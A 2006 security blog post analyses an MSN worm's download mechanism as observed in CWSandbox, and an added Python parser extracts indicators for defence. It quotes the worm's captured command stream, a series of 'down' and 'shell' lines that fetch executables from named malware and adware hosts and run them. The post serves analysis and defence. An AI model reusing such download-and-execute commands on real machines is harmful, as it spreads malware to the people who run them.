CWSandbox vs. MSN Worms

Thursday, September 28. 2006
The very good weblog from F-Secure recently had an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). To download additional malware to the infected hosts, the worm uses a very simple transfer mechanism on TCP port 80:
$ nc XXX.64.38.YYY 80
down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, one of them again being adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.
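The command stream above is simple enough that a defender can pull the indicators out of a captured session mechanically: every "down URL filename" is a download URL plus the local name it is saved under, and every "shell filename" is an execution. The following Python script is an added example and not part of the original post or of CWSandbox; it parses the quoted session (embedded here as constructed sample input, with the redacted URL paths kept as the literal "[Removed]" placeholder) and summarises which hosts served payloads, which files were executed, and which executions refer to a file that was never downloaded in the same session.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed sample input: the command stream as quoted in the post.
# The URL paths are the post's own "[Removed]" redaction placeholders.
SAMPLE_SESSION = """down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;
"""


@dataclass
class SessionSummary:
    downloads: List[Tuple[str, str]]  # (url, local filename), in order received
    executed: List[str]               # filenames passed to "shell", in order
    unknown: List[str]                # commands the parser did not recognise


def parse_commands(stream: str):
    """Split the stream on ';' (the separator used in the capture) and
    yield (verb, args) tuples. Newlines are just whitespace here, since
    one line may carry several commands (see the first line above)."""
    for raw in stream.split(";"):
        cmd = raw.strip()
        if not cmd:
            continue
        parts = cmd.split(None, 1)
        verb = parts[0].lower()
        args = parts[1].split() if len(parts) > 1 else []
        yield verb, args


def summarize(stream: str) -> SessionSummary:
    """Classify each command; anything that is not a well-formed
    'down <url> <file>' or 'shell <file>' is kept for manual review."""
    summary = SessionSummary([], [], [])
    for verb, args in parse_commands(stream):
        if verb == "down" and len(args) == 2 and re.match(r"^https?://", args[0]):
            summary.downloads.append((args[0], args[1]))
        elif verb == "shell" and len(args) == 1:
            summary.executed.append(args[0])
        else:
            summary.unknown.append(" ".join([verb, *args]))
    return summary


def payload_hosts(summary: SessionSummary) -> List[str]:
    """Distinct hostnames that served payloads (block-list candidates)."""
    return sorted({urlparse(url).hostname for url, _ in summary.downloads})


def execution_counts(summary: SessionSummary) -> Counter:
    """How often each file was started; repeated 'shell a.exe' stands out."""
    return Counter(summary.executed)


def executed_without_download(summary: SessionSummary) -> List[str]:
    """Files executed although no 'down' in this session fetched them;
    in a longer capture these point at payloads staged earlier."""
    downloaded = {name for _, name in summary.downloads}
    return sorted(set(summary.executed) - downloaded)


if __name__ == "__main__":
    s = summarize(SAMPLE_SESSION)
    print("payload hosts:", payload_hosts(s))
    print("downloads:", s.downloads)
    print("execution counts:", dict(execution_counts(s)))
    print("executed without download:", executed_without_download(s))
    print("unrecognised commands:", s.unknown)
```

Run against a live capture, the same split-on-semicolon logic works on the raw TCP payload from a pcap, because the protocol has no framing beyond the ';' separator; the hostnames from payload_hosts() are what you would feed to a proxy block list, and the execution_counts() output shows that a.exe is started four times in this one session.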

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. It seems there are now several companies offering such services; let's see who is successful...